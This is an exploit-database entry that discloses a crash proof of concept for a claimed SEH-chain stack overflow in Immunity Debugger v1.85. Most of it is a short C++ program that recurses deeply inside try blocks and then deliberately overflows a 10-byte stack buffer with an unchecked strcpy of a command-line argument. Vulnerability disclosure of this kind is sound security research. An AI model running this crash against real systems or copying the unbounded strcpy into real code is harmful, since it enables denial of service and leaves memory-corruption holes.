Immunity Debugger Stack Overflow Vulnerability – PoC

2014-03-22T00:00:00
ID 1337DAY-ID-22052
Type zdt
Reporter vhatass
Modified 2014-03-22T00:00:00

Description

Title : Immunity Debugger – Crash POC Name: Immunity Debugger v1.85 SEH Chain Stack Overflow Discoverer: Veysel HATAŞ ([email protected]) Vendor: Immunity Inc
Systems Affected: Windows Risk: Low Status: Not Fixed Discovered: 05 January 2014 Reported: 06 January 2014 Published: 20 March 2014 Description: Immunity Debugger V1.85 contains stack overflow vulnerability in //its SEH chain mechanism

                                        
                                            /* ==================================================
Filename :  Crash_POC.cpp

Title : Immunity Debugger – Crash POC
Name: Immunity Debugger v1.85 SEH Chain Stack Overflow
Discoverer: Veysel HATAŞ ([email protected])
Vendor: Immunity Inc   
Systems Affected: Windows
Risk: Low
Status: Not Fixed

Discovered: 05 January 2014
Reported: 06 January 2014
Published: 20 March 2014

Description: Immunity Debugger V1.85 contains stack overflow vulnerability in //its SEH chain mechanism

=================================================== */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int g_Count;

void foo(char *data);

int main(int argc, char* argv[])
{
      g_Count = 0;

      foo(argv[1]);
      return 0;
}

void foo(char *data)
{
      char salla[10];

      printf("Deneme - %d\n", g_Count);
      g_Count++;

      if (g_Count == 510){
            strcpy(salla, data);
      }

      try{
            foo(data);
      }
      catch(int e){
            printf("Error code is : %d", e);
      }
}

#  0day.today [2018-03-14]  #